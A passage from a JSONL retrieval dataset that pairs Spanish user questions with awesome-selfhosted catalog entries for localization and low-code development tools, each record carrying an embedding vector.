Development - Localization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Localization", "tema": "software development - localization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Localization: Accent β€” Developer-oriented translation tool [BSD-3-Clause, Elixir/Docker]. Tolgee β€” Developer & translator friendly web-based localization platform enabling users to translate directly in the app they develop [Apache-2.0, Docker/Java]. Traduora β€” Translation management platform for teams [AGPL-3.0, Docker/K8S/Nodejs]. Weblate β€” Web-based translation tool with tight version control integration [GPL-3.0, Python/Docker/K8S].", "indexar": "que herramienta sirve para traducir directamente dentro de la aplicaciΓ³n que estoy desarrollando?", "v": [0.04078, 0.20599, -0.22109, -0.21281, 0.1222, -0.11245, -0.04941, -0.00873, 0.03266, -0.01393, -0.10504, -0.09554, -0.05761, -0.09357, 0.06053, 0.00663, 0.05347, -0.13645, 0.01063, -0.00814, -0.0102, 0.02897, -0.14164, -0.1154, -0.09486, 0.00108, 0.00234, -0.04915, -0.14436, 0.01747, -0.01551, 0.02722, 0.05873, -0.06069, -0.07538, -0.11475, -0.06519, -0.00277, -0.02789, 0.0803, 0.04016, 0.03515, -0.01565, 0.04873, -0.0164, 0.04352, 0.05655, -0.07053, -0.05313, 0.06794, -0.09941, -0.10347, -0.06114, 0.00967, -0.016, -0.13613, 0.15732, -0.20494, 0.12194, -0.06526, -0.05253, -0.03696, 0.02383, -0.06348, 0.08339, -0.06349, 0.00225, 0.00508, -0.11597, 0.03379, -0.07291, 0.14086, -0.01099, -0.01029, -0.04533, 0.0194, -0.03788, -0.01126, 0.08325, 0.00221, 0.03945, -0.04231, -0.07022, 0.03046, 0.02029, -0.05062, 0.13775, -0.00128, 0.0686, -0.03551, -0.09404, -0.05394, -0.03182, -0.04211, 0.06547, -0.0382, 0.03887, -0.03067, 0.06848, -0.00651, 0.11893, -0.14593, -0.01774, -0.04216, -0.07207, 0.04336, 0.04472, -0.06844, -0.02307, -0.00023, 0.06286, -0.00617, 0.03456, 0.00335, -0.04121, 0.01988, 0.00344, -0.02134, -0.02564, -0.07168, -0.07292, 0.02943, -0.05283, -0.03495, 0.0047, -0.03872, -0.03755, 0.09815, -0.00444, 0.00095, -0.02374, -0.05607, -0.07089, 0.08991, -0.04142, -0.02003, 0.10538, -0.03977, 0.04698, -0.01542, 0.01958, 0.00373, -0.01221, -0.0471, 0.04672, -0.00017, 0.02241, -0.03497, 0.01312, 0.00062, 0.06732, -0.14102, -0.02781, 0.05816, -0.08846, -0.00604, -0.00389, -0.02573, -0.06379, 0.03508, -0.08246, -0.04532, -0.01641, -0.03271, -0.07623, -0.08612, 0.02294, -0.01682, 0.07135, 0.07037, 0.03433, 0.01804, 0.06776, -0.07305, 0.02162, -0.01525, -0.03236, 0.04023, 0.03559, -0.10972, -0.05212, -0.00486, -0.01958, -0.02024, 0.00644, -0.02136, 0.00544, 0.00344, -0.04273, 0.03364, -0.03747, 0.02986, 0.01001, -0.05904, -0.00528, 0.00197, -0.01268, -0.03227, -0.01672, -0.10177, -0.08065, -0.0179, -0.00777, -0.01508, 0.02616, 0.08127, -0.00308, 0.03654, -0.04448, 0.06686, -0.00708, 0.04441, 0.06844, 0.04185, 0.02298, -0.05822, 0.04648, 0.04226, 0.02869, -0.02234, -0.01166, -0.0368, 0.06129, -0.02636, -0.01396, 0.04716, 0.03679, -0.00356, -0.0102, 0.01326, -0.01379, -0.00102, -0.04535, -0.05263, 0.03407, -0.01972, 0.01298, 0.00256, -0.09604, -0.0818, -0.04002, 0.05681, 0.00651, 0.01118, -0.10233, -0.05489, -0.0214, -0.03488, -0.03013, -0.09137, -0.04702, 0.0473, 0.10886, -0.03015, 0.03921, -0.02425]} +{"tipo": "pregunta", "herramienta": "Software Development - Localization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Localization", "tema": "software development - localization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Localization: Accent β€” Developer-oriented translation tool [BSD-3-Clause, Elixir/Docker]. Tolgee β€” Developer & translator friendly web-based localization platform enabling users to translate directly in the app they develop [Apache-2.0, Docker/Java]. Traduora β€” Translation management platform for teams [AGPL-3.0, Docker/K8S/Nodejs]. Weblate β€” Web-based translation tool with tight version control integration [GPL-3.0, Python/Docker/K8S].", "indexar": "cual es una alternativa libre a Tolgee para gestionar localizaciones?", "v": [-0.19901, 0.03828, -0.1288, 0.03025, -0.00218, -0.01189, 0.04221, 0.00928, -0.10031, 0.03218, -0.12566, -0.13317, 0.11756, 0.15452, 0.13615, -0.04065, 0.08032, -0.21506, 0.04311, -0.00338, -0.13269, 0.06532, -0.00385, -0.12824, 0.12515, -0.15752, 0.02402, -0.19784, -0.06434, -0.01201, -0.01435, -0.16004, 0.00393, -0.07831, 0.01618, 0.09328, 0.13136, 0.07823, 0.07973, -0.05265, -0.05207, -0.09792, -0.11349, 0.12176, 0.0088, -0.08383, -0.00794, -0.01289, 0.06515, 0.07414, -0.09111, 0.00299, -0.00096, -0.01642, 0.17702, 0.02687, 0.09927, -0.1253, -0.06511, -0.03642, -0.14114, 0.02624, 0.00763, -0.00791, 0.0277, 0.04078, 0.02033, 0.06338, -0.0723, 0.07104, 0.0349, -0.02681, 0.01581, 0.0146, -0.04187, 0.05536, -0.02227, 0.05161, 0.01393, 0.00569, 0.10327, -0.04097, -0.00579, 0.01601, -0.03635, -0.0164, 0.0146, -0.10253, -0.05083, 0.01684, 0.01106, -0.04453, -0.0082, 0.0516, -0.04044, -0.0488, 0.06317, 0.04033, -0.05193, 0.08471, 0.09429, 0.04343, -0.10646, 0.09493, -0.03407, -0.00559, -0.00686, -0.02281, -0.06557, 0.02208, 0.00747, 0.01321, 0.01903, 0.04367, -0.04272, 0.05137, -0.00134, 0.00749, 0.06168, -0.00993, -0.01287, -0.1019, -0.02217, -0.08317, 0.07225, -0.00432, 0.07489, 0.02754, 0.00872, 0.07516, 0.04825, -0.05488, 0.01058, -0.08629, -0.06527, -0.0073, 0.03126, 0.01277, 0.00126, 0.03709, -0.10253, -0.00297, -0.01712, -0.00925, 0.05322, -0.0625, 0.0202, -0.04773, 0.11421, 0.05601, -0.07491, -0.06753, -0.00267, 0.0894, 0.00577, 0.00891, -0.04808, -0.03523, -0.1587, 0.04821, 0.08456, -0.01272, -0.03531, 0.01836, 0.0128, -0.02538, 0.01797, 0.00824, -0.05853, 0.00795, 0.02362, 0.09161, 0.05298, -0.05132, 0.03667, -0.06838, 0.03829, -0.14583, 0.0412, -0.01543, 0.05027, 0.01077, -0.0516, 0.04341, -0.02381, -0.01001, -0.0332, 0.0669, -0.00588, 0.04466, -0.03192, 0.0562, -0.0409, -0.08256, 0.00971, 0.00831, 0.01772, -0.07419, -0.03481, 0.00132, -0.07308, -0.01634, -0.02706, -0.01711, -0.02383, 0.00521, -0.03142, 0.07108, 0.04084, 0.02937, 0.00754, 0.01644, 0.04455, 0.02666, -0.07752, -0.05823, 0.00758, -0.03475, 0.00719, -0.0221, -0.00972, 0.04106, 0.01861, 0.00303, -0.01553, -0.00218, 0.06027, 0.02044, -0.02677, 0.03179, 0.01783, 0.02476, 0.02255, 0.05695, 0.01731, -0.02097, 0.00697, -0.03045, 0.01766, -0.04159, 0.06195, 0.04908, -0.00952, -0.01773, -0.05571, 0.05413, -0.06777, 0.0343, -0.04514, -0.04365, 0.00025, 0.04575, 0.01243, 0.02732, 0.03281, 0.00892]} +{"tipo": "pregunta", "herramienta": "Software Development - Localization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Localization", "tema": "software development - localization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Localization: Accent β€” Developer-oriented translation tool [BSD-3-Clause, Elixir/Docker]. Tolgee β€” Developer & translator friendly web-based localization platform enabling users to translate directly in the app they develop [Apache-2.0, Docker/Java]. Traduora β€” Translation management platform for teams [AGPL-3.0, Docker/K8S/Nodejs]. Weblate β€” Web-based translation tool with tight version control integration [GPL-3.0, Python/Docker/K8S].", "indexar": "con que puedo crear un gestor de traducciones para equipos sin necesidad de comprar licencias?", "v": [0.14579, 0.01394, -0.10567, -0.22276, 0.05832, -0.09134, -0.04242, 0.04455, -0.13487, -0.15446, -4e-05, -0.01632, 0.06097, -0.07722, 0.10637, 0.06155, 0.04507, -0.13555, 0.06261, 0.06759, 0.09707, -0.00183, 0.05708, -0.11143, -0.02469, -0.03077, 0.11785, -0.1354, -0.09754, 0.11099, -0.12812, 0.08622, 0.04513, -0.05632, 0.04477, -0.03209, -0.02064, 0.0735, 0.08514, 0.05618, 0.02686, 0.01953, -0.03808, -0.00656, -0.01629, -0.08319, 0.03362, -0.04402, 0.04731, -0.06089, -0.02274, 0.01998, -0.14706, -0.11945, 0.06541, -0.08136, 0.13168, -0.13238, 0.10749, -0.05173, -0.11087, 0.00051, 0.03679, 0.00476, 0.03341, 0.10963, -0.03497, 0.02026, 0.00455, -0.05192, -0.13007, -0.02882, -0.02414, 0.00091, 0.01855, 0.02993, -0.03726, -0.05537, 0.06282, 0.00133, 0.11509, 0.04188, -0.06638, -0.07303, 0.04844, -0.0055, 0.01242, -0.02252, 0.11808, -0.04507, -0.03991, -0.09263, 0.00081, -0.07152, 0.05805, -0.03676, 0.05019, -0.02189, -0.06254, 0.08564, -0.11398, 0.0496, 0.04399, 0.05162, -0.10739, 0.15258, 0.15714, -0.09438, 0.00921, 0.05985, -0.0055, 0.05531, -0.0618, 0.00942, 0.03313, 0.02423, -0.0032, -0.00324, 0.0373, 0.12203, -0.02605, -0.09567, -0.0037, -0.04622, 0.06266, -0.02367, 0.06799, 0.12215, -0.00614, -0.01779, 0.00636, -0.01091, -0.00095, 0.06831, -0.10736, 0.07655, -0.02025, 0.01221, -0.06327, -0.0948, -0.10829, 0.02562, 0.01757, 0.04869, 0.05051, 0.06161, -0.06623, -0.07212, -0.01745, -0.02255, 0.06354, -0.0143, -0.00575, 0.09328, -0.01902, 0.07736, -0.02747, -0.06441, -0.00434, 0.06699, 0.02369, 0.05752, 0.03216, -0.07219, -0.05557, 0.02444, -0.07592, 0.03124, 0.03452, 0.06197, -0.03326, -0.06661, 0.00833, -0.0432, 0.029, -0.00808, -0.00596, -0.0404, -0.01314, -0.04959, -0.03407, -0.00199, -0.10554, -0.0182, 0.01616, -0.00556, -0.0381, 0.07712, -0.01963, 0.00987, 0.02189, 0.00884, -0.03194, -0.0913, 0.04465, 0.00891, -0.02135, 0.05193, -0.06443, -0.11012, -0.02925, -0.01612, -0.04051, 0.0122, 0.01776, -0.03027, -0.07373, 0.0873, 0.00828, 0.05321, -0.00873, -0.00277, -0.00942, -0.01065, -0.05317, -0.04191, -0.02647, -0.0258, 0.02651, -0.00073, 0.08309, -0.01896, 0.02992, 0.00838, 0.03501, -0.05104, 0.0039, 0.0491, 0.04058, 0.03884, -0.0507, 0.05565, -0.0042, -0.00673, 0.01216, 0.02066, 0.01897, 0.0345, -0.03552, -0.01459, 0.00481, 0.05509, -0.00925, -0.03423, -0.06986, -0.00961, -0.05158, -0.04948, -0.01327, -0.07864, 0.01278, 0.07237, 0.03086, 0.00486, 0.05351, -0.01445]} +{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: Appsmith β€” Build admin panels, CRUD apps and workflows. Build everything you need, 10x faster [Apache-2.0, Java/Docker/K8S]. Appwrite β€” End to end backend server for web, native, and mobile developers πŸš€ [BSD-3-Clause, Docker]. Halo β€” A powerful and easy-to-use website building tool (documentation in Chinese) [GPL-3.0, Java/Docker]. Manifest β€” Complete backend that fits into 1 YAML file [MIT, Nodejs]. PocketBase β€” Backend for your next SaaS and Mobile app in one file [MIT, Go/Docker]. Saltcorn β€” No-code database application builder for web and mobile applications. One platform for user interface, data backend, durable workflows, email, PDF generation, and AI applications [MIT, Docker/Nodejs]. SQLPage β€” SQL-only dynamic website builder [MIT, Rust/Docker]. ToolJet β€” Low-code framework to build & deploy internal tools with minimal engineering effort (alternative to Retool and Mendix) [GPL-3.0, Nodejs/Docker/K8S].", "indexar": "con que puedo montar una aplicaciΓ³n de gestiΓ³n interna sin escribir mucho cΓ³digo?", "v": [-0.06097, 0.13235, -0.11118, -0.19487, -0.10157, -0.17361, -0.11095, 0.1041, -0.1348, -0.12094, -0.0344, -0.12033, 0.09284, -0.12032, 0.07692, 0.01515, 0.15539, -0.08863, 0.05223, 0.02054, -0.05384, -0.03203, -0.02712, -0.05671, -0.04794, 0.07227, -0.0413, -0.06355, -0.07037, -0.06416, -0.02361, 0.06817, 0.12793, 0.00971, -0.08915, 0.00136, 0.02203, 0.05893, -0.04874, 0.11358, -0.03051, 0.08655, -0.08406, 0.11283, 0.05026, -0.0224, 0.17391, 0.02365, -0.03585, 0.01789, -0.0509, -0.10279, 0.00175, 0.0056, -0.04269, 0.01243, 0.09479, -0.08903, 0.02075, -0.03647, 0.00352, 0.07348, 0.00149, 0.01385, 0.06017, -0.04147, 0.10495, 0.1225, -0.09012, 0.09033, 0.01216, 0.01915, -0.13938, 0.04756, 0.11603, 0.03516, -0.05115, -0.01202, 0.02524, 0.11558, -0.02345, -0.0224, -0.09581, 0.06011, 0.02575, -0.04799, -0.00035, -0.13241, 0.0602, -0.03433, 0.07025, -0.12845, -0.0337, -0.10426, 0.01261, -0.00882, 0.04719, 0.06545, 0.06374, 0.08107, -0.00833, -0.08104, 0.02122, 0.04708, 0.08556, 0.10364, 0.10105, -0.05618, 0.09604, 0.00849, -0.00647, -0.08022, -0.13098, 0.01108, -0.12227, -0.07847, 7e-05, 0.01429, -0.01997, -0.09985, -0.1257, 0.00949, -0.01664, -0.03092, 0.08983, 0.01749, 0.07196, 0.1298, -0.05651, 0.0108, -0.06242, -0.02904, -0.03325, 0.01592, 0.01584, 0.04858, -0.01101, 0.06092, 0.02222, 0.03517, -0.05253, -0.03008, -0.00606, 0.04212, -0.02866, 0.07195, -0.04146, -0.1016, -0.03292, 0.04353, 0.03832, 0.01676, -0.02505, 0.03771, -0.13567, 0.02082, 0.03428, -0.0327, -0.05852, -0.01313, -0.08738, 0.02957, -0.10736, 0.02155, -0.02097, -0.02448, 0.00197, -0.03461, 0.04368, 0.02873, -0.002, 0.04164, 0.09395, -0.02064, 0.08181, -0.04748, -0.01639, -0.00515, -0.0312, -0.04494, -0.03805, 0.01977, 0.03361, 0.02576, 0.02314, 0.0121, 0.02362, 0.03478, -0.03815, -0.03244, 0.02484, 0.02216, 0.06518, 0.00723, 0.01206, -0.03434, -0.00107, 0.00664, 0.02146, -0.10539, -0.05285, 0.02906, -0.02876, -0.02442, 0.04477, 0.03488, -0.07353, 0.09218, -0.01141, 0.0712, 0.05893, -0.01162, 0.0116, 0.06786, -0.01223, -0.02304, 0.00646, 0.05241, 0.03135, -0.0052, 0.02325, -0.02, 0.038, -0.04405, 0.04529, -0.00453, -0.02104, 0.00729, -0.01784, 0.05877, -0.01503, -0.02914, -0.0213, 0.02484, 0.04159, 0.00471, -0.0042, -0.0265, -0.0402, -0.04951, -0.01448, 0.05026, 0.03166, -0.03284, -0.00709, -0.00505, -0.057, 0.00091, -0.04718, -0.02757, -0.03591, -0.04604, 0.02978, -0.03744, 0.0309, 0.0033]} +{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: Appsmith β€” Build admin panels, CRUD apps and workflows. Build everything you need, 10x faster [Apache-2.0, Java/Docker/K8S]. Appwrite β€” End to end backend server for web, native, and mobile developers πŸš€ [BSD-3-Clause, Docker]. Halo β€” A powerful and easy-to-use website building tool (documentation in Chinese) [GPL-3.0, Java/Docker]. Manifest β€” Complete backend that fits into 1 YAML file [MIT, Nodejs]. PocketBase β€” Backend for your next SaaS and Mobile app in one file [MIT, Go/Docker]. Saltcorn β€” No-code database application builder for web and mobile applications. One platform for user interface, data backend, durable workflows, email, PDF generation, and AI applications [MIT, Docker/Nodejs]. SQLPage β€” SQL-only dynamic website builder [MIT, Rust/Docker]. ToolJet β€” Low-code framework to build & deploy internal tools with minimal engineering effort (alternative to Retool and Mendix) [GPL-3.0, Nodejs/Docker/K8S].", "indexar": "que herramienta sirve para crear paneles administrativos y aplicaciones CRUD rΓ‘pidamente?", "v": [0.05846, 0.0294, -0.09769, -0.28172, 0.08543, -0.15188, 0.06504, 0.06965, -0.05724, -0.01755, -0.1046, -0.13129, -0.08225, -0.1256, 0.09051, -0.00094, -0.05032, -0.11934, 0.05157, 0.10707, 0.0062, -0.01859, -0.12546, 0.03818, -0.16257, 0.04978, 0.04849, -0.10222, -0.06499, 0.0046, 0.06007, 0.11743, 0.0813, -0.06008, -0.11095, -0.12737, -0.05165, 0.02191, -0.15835, 0.12093, -0.00622, 0.03825, -0.06151, 0.05813, 0.0613, 0.01765, 0.03637, -0.01843, -0.07585, 0.0946, -0.0591, -0.14004, -0.15772, -0.0142, 0.01057, -0.09654, 0.11971, -0.10932, -0.00468, -0.10708, -0.08109, 0.11987, -0.03215, 0.01752, -0.02615, -0.00466, 0.04301, 0.0271, -0.08344, 0.06466, -0.05566, -0.00928, 0.03664, -0.03323, 0.03875, 0.04478, -0.04797, 0.04451, 0.01958, -0.03503, 0.01332, -0.02195, -0.11408, 0.02146, -0.1013, -0.1193, 0.05283, 0.04276, -0.03379, -0.0556, 0.03555, 0.0107, -0.01707, 0.03173, 0.04421, -0.02192, 0.06462, -0.0294, 0.05048, 0.09347, 0.05251, -0.11012, -0.07073, 0.00845, -0.11928, 0.03631, -0.00759, -0.05968, 0.01924, 0.00418, 0.07294, -0.02509, 0.02674, 0.03199, 0.00887, 0.04694, -0.00789, -0.0542, -0.06439, -0.0304, 0.04288, -0.00079, -0.02949, -0.04583, 0.01401, -0.0522, 0.01457, 0.06901, -0.02252, 0.02383, 0.03539, -0.09716, -0.10749, 0.08107, -0.04092, -0.00874, 0.00871, -0.08382, 0.01178, -0.0469, 0.04646, 0.06969, -0.0629, -0.08352, 0.04636, -0.00684, 0.04424, -0.02293, 0.08218, 0.07525, 0.06897, -0.07394, -0.01067, 0.01696, -0.07532, -0.0292, -0.00501, 0.01496, -0.09747, -0.01857, -0.0469, -0.02073, 0.00471, 0.02024, -0.00596, -0.1066, 0.00562, 0.04698, 0.11358, 0.08891, -0.0054, 0.03625, 0.09664, -0.0288, 0.06082, -0.02629, 0.01515, 0.00255, 0.01195, -0.09997, -0.09764, -0.05628, 0.00474, 0.00402, 0.0308, -0.06939, 0.00408, -0.01721, 0.00398, 0.04226, -0.00164, 0.09249, 0.01862, -0.05168, -0.03217, 0.04134, 0.02525, -0.07121, 0.02176, -0.04049, -0.00836, -0.03198, -0.01103, -0.06452, 0.00905, 0.07713, -0.03092, 0.09234, -0.01054, 0.05906, 0.01065, 0.04907, 0.04455, 0.03982, -0.00373, -0.06835, 0.02273, 0.01293, 0.00706, -0.0395, 0.03524, -0.02789, -0.00945, 0.0005, 0.05239, 0.04461, 0.03513, 0.03822, -0.0366, -0.00045, 0.03901, -0.01449, 0.04346, -0.02896, 0.04202, -0.02966, 0.03521, -0.0307, -0.04486, -0.02705, -0.02384, 0.03938, 0.04768, -0.00975, -0.02738, -0.03623, 0.01581, -0.02271, -0.04563, -0.08498, -0.05412, 0.01406, 0.07319, 0.01335, 0.01622, -0.01034]} +{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: Appsmith β€” Build admin panels, CRUD apps and workflows. Build everything you need, 10x faster [Apache-2.0, Java/Docker/K8S]. Appwrite β€” End to end backend server for web, native, and mobile developers πŸš€ [BSD-3-Clause, Docker]. Halo β€” A powerful and easy-to-use website building tool (documentation in Chinese) [GPL-3.0, Java/Docker]. Manifest β€” Complete backend that fits into 1 YAML file [MIT, Nodejs]. PocketBase β€” Backend for your next SaaS and Mobile app in one file [MIT, Go/Docker]. Saltcorn β€” No-code database application builder for web and mobile applications. One platform for user interface, data backend, durable workflows, email, PDF generation, and AI applications [MIT, Docker/Nodejs]. SQLPage β€” SQL-only dynamic website builder [MIT, Rust/Docker]. ToolJet β€” Low-code framework to build & deploy internal tools with minimal engineering effort (alternative to Retool and Mendix) [GPL-3.0, Nodejs/Docker/K8S].", "indexar": "cual es la mejor alternativa libre a Retool o Mendix para construir herramientas internas?", "v": [-0.12235, 0.01565, -0.15581, -0.04155, -0.04118, -0.02312, -0.12312, 0.01898, -0.18381, -0.12318, -0.09196, -0.07771, 0.03031, -0.06632, 0.16806, 0.07726, -0.00046, -0.11903, 0.13182, -0.04613, -0.06905, -0.02584, -0.13868, -0.03025, 0.04567, -0.09998, 0.07139, -0.04923, -0.07376, 0.02458, 0.05353, -0.00789, 0.06283, -0.01709, -0.09711, -0.06163, 0.11594, 0.08324, 0.04035, -0.03853, -0.0785, 0.02248, -0.10956, 0.08291, 0.05375, -0.07773, 0.00112, -0.00713, -0.03812, 0.06636, -0.00801, -0.11527, 0.02453, -0.05541, 0.11095, -0.07996, 0.18155, -0.09885, 0.00153, -0.10073, -0.08465, 0.06308, -0.07282, -0.02069, 0.01921, -0.00783, -0.12762, -0.06337, -0.05543, 0.1443, -0.02325, -0.04582, -0.00594, -0.03824, -0.12351, 0.0242, -0.07338, -0.00308, -0.01273, 0.00792, 0.01252, -0.04681, -0.07009, 0.06078, -0.01714, -0.03672, -0.01638, -0.16463, -0.00378, 0.00574, -0.01021, -0.03046, -0.00888, 0.11334, -0.03523, -0.0502, 0.07785, 0.10274, -0.01776, 0.00624, 0.01043, -0.04412, 0.00613, -0.0203, 0.0339, -0.06834, -0.04173, 0.05706, -0.05399, 0.00324, 0.07712, 0.12718, 9e-05, 0.06671, -0.00026, -0.05992, -0.08048, 0.00398, -0.08429, -0.06595, 0.05341, 0.01291, -0.11937, -0.04457, -0.01469, -0.06238, 0.0629, 0.01159, -0.01103, -0.01355, 0.04649, -0.08164, -0.024, -0.09027, -0.12265, -0.04644, 0.09215, -0.13167, -0.02752, -0.07864, -0.00904, 0.01294, -0.04575, -0.10114, -0.04126, 0.01064, -0.03531, -0.00094, 0.11249, -0.02226, -0.05177, 0.04373, 0.10089, 0.0922, -0.05902, -0.04909, -0.06909, 0.0105, -0.12267, 0.16403, -0.03132, -0.04829, 0.01921, 0.00716, 0.02415, -0.05482, 0.02437, 0.05171, -0.04515, 0.018, 0.05322, 0.04241, 0.11075, -0.05757, -0.02257, -0.06657, -0.02561, -0.09622, 0.0176, -0.03334, 0.02322, 0.023, -0.05533, -0.02325, 0.06139, -0.01445, 0.02373, 0.01894, 0.0333, 0.04627, -0.09659, -0.01596, 0.00489, -0.06363, 0.04339, -0.01458, 0.00899, -0.05633, -0.00756, 0.01336, -0.02967, -0.00546, -0.02426, -0.06763, 0.01066, -0.00857, -0.04336, -0.0234, 0.00181, 0.04019, 0.09513, 0.01287, 0.04365, 0.01536, -0.02708, -0.00654, 0.01787, 0.01464, -0.01113, -0.03681, 0.03756, 0.02807, 0.07712, -0.03917, -0.03043, 0.04446, -0.01221, 0.03455, -0.07964, -0.01578, 0.01084, -0.0342, -0.02163, -0.01479, -0.0092, -0.03915, 0.01125, 0.02989, 0.04134, 0.01171, 0.04213, 0.06755, -0.03115, -0.02657, -0.03472, 0.00652, -0.03768, -0.01381, -0.0465, -0.06221, -0.0506, 0.02587, -0.00968, -0.00674, 0.01236, -0.0264]} +{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: TrailBase β€” Open, sub-millisecond, single-executable FireBase alternative with type-safe REST & realtime APIs, built-in JS/TS runtime, auth & admin UI [OSL-3.0, Rust/Docker].", "indexar": "ΒΏhay una alternativa a Firebase que sea open source y tenga un solo ejecutable?", "v": [-0.16375, 0.08178, -0.12239, 0.04324, -0.05249, -0.01659, -0.09864, -0.04317, -0.06984, -0.09675, -0.22836, -0.12662, -0.00525, 0.13434, 0.06501, -0.01136, -0.01485, -0.02323, 0.02666, -0.14497, -0.04002, 0.0118, -0.13464, -0.09072, -0.01409, -0.03511, -0.02089, 0.09961, -0.12747, -0.11616, 0.0525, 0.05993, 0.13825, 0.0059, 0.03351, 0.05035, -0.04724, -0.01026, 0.05181, -0.02848, -0.05387, -0.08887, -0.12966, 0.19399, -0.02414, 0.01853, -0.0392, 0.02403, 0.04975, 0.03783, -0.07917, -0.02997, -0.17123, -0.01565, 0.08735, 0.02045, 0.06417, -0.17088, -0.03218, -0.00231, -0.13218, -0.05609, 0.07894, -0.21285, 0.07805, 0.02873, 0.05295, 0.00292, 0.00789, 0.04259, -0.12804, 0.02467, -0.05092, 0.01215, -0.06972, -0.04818, -0.02228, -0.03004, -0.03489, 0.08584, -0.04054, -0.13215, -0.07655, -0.00918, -0.09211, -0.01723, 0.02708, -0.08163, -0.02014, 0.0046, 0.0603, 0.02264, -0.01337, 0.18288, -0.05766, -0.03003, -0.03243, 0.01679, -0.02981, 0.06833, 0.07659, -0.02865, 0.01738, -0.00285, 0.0409, -0.0115, 0.03171, -0.06109, -0.0538, -0.01852, -0.045, 0.0021, 0.01289, -0.01691, -0.00892, -0.12708, -0.0906, -0.03242, 0.00545, -0.03141, -0.08316, -0.04614, -0.03385, 0.02452, 0.00825, -0.00343, -0.02173, 0.00924, -0.03309, 0.04406, 0.0013, -0.02575, -0.00273, -0.06956, -0.04401, 0.03358, 0.06345, -0.02968, 0.03125, -0.08247, 0.04622, 0.06733, 0.04816, -0.05282, 0.0552, -0.09786, -0.05545, -0.01915, -0.00147, 0.02031, -0.04774, -0.0305, -0.08153, 0.06908, -0.13111, 0.00439, 0.00267, 0.05703, -0.05531, 0.0763, 0.0707, 0.0342, -0.02523, -0.01703, -0.02185, 0.00565, -0.02726, -0.00519, 0.0279, 0.02502, 0.06611, 0.14213, -0.03724, 0.0102, 0.07698, -0.12068, 0.00405, -0.12426, 0.04265, 0.0368, 0.01644, -0.03098, -0.00971, 0.05406, 0.04919, -0.00747, 0.06423, -0.05535, -0.07512, 0.0766, -0.01973, -0.01409, -0.08423, -0.02903, -0.01839, -0.01563, -0.0068, -0.01013, -0.01245, -0.0038, -0.09062, 0.03459, 0.02765, -0.03113, 0.01074, -0.00779, -0.05967, 0.06069, -0.04263, 0.02096, 0.05716, 0.01484, 0.0966, 0.0192, -0.02481, 0.00348, 0.02902, 0.02706, 0.06434, -0.01111, -0.00963, 0.03991, 0.04503, -0.01026, 0.03432, 0.01578, 0.0175, 0.00281, 0.04333, 0.0308, 0.00453, -0.01277, 0.01998, 0.02002, 0.00057, 0.00777, -0.01785, 0.01358, 0.00679, -0.06303, 0.00353, 0.03648, 0.00741, -0.00212, 0.02725, -0.03836, -0.0672, 0.0486, 0.00078, -0.03161, -0.09384, -0.00136, 0.01355, 0.01027, 0.0164, -0.0413]} +{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: TrailBase β€” Open, sub-millisecond, single-executable FireBase alternative with type-safe REST & realtime APIs, built-in JS/TS runtime, auth & admin UI [OSL-3.0, Rust/Docker].", "indexar": "con quΓ© programa puedo crear una API en tiempo real sin necesidad de servidores complejos?", "v": [-0.08388, 0.11896, -0.07638, -0.12715, 0.06003, -0.13771, 0.14948, -0.11463, -0.07335, -0.02228, 0.00737, -0.03992, 0.01651, -0.13326, 0.08664, 0.0301, 0.09305, -0.10497, 0.09386, 0.16426, 0.04013, -0.04667, -0.09463, 0.02915, -0.02192, 0.00093, 0.16607, -0.00847, -0.08357, -0.00755, -0.06632, 0.02342, 0.04756, -0.08435, -0.02483, -0.03527, -0.05116, 0.15996, -0.11406, 0.07389, 0.07981, -0.02724, -0.06929, 0.07258, 0.0088, 0.04243, 0.10949, -0.05091, -0.01861, -0.07106, -0.11664, 0.01137, -0.10459, 0.00064, 0.02989, -0.06111, 0.01578, -0.18463, 0.0071, 0.04176, -0.1489, 0.06651, -0.03787, -0.04628, 0.06127, -0.03788, 0.03567, 0.00699, -0.08891, 0.03976, -0.16992, -0.13329, -0.03415, -0.05532, 0.00903, 0.07748, -0.05357, -0.15723, -0.00744, 0.02131, 0.0371, 0.06556, 0.02332, 0.01863, -0.04255, -0.08488, 0.02606, -0.03467, 0.00607, -0.01775, -0.0341, 0.09004, 0.0132, 0.09389, 0.07825, 0.04139, 0.14994, -0.03769, 0.03465, 0.07739, -0.03556, -0.06004, -0.11772, 0.03689, 0.00537, 0.11871, 0.14497, -0.06016, 0.02185, -0.01598, 0.01339, -0.03542, -0.07498, -0.04327, -0.00646, 0.0248, 0.03232, -0.0394, 0.00871, 0.00281, -0.05115, 0.00661, -0.00173, -0.00224, -0.00173, 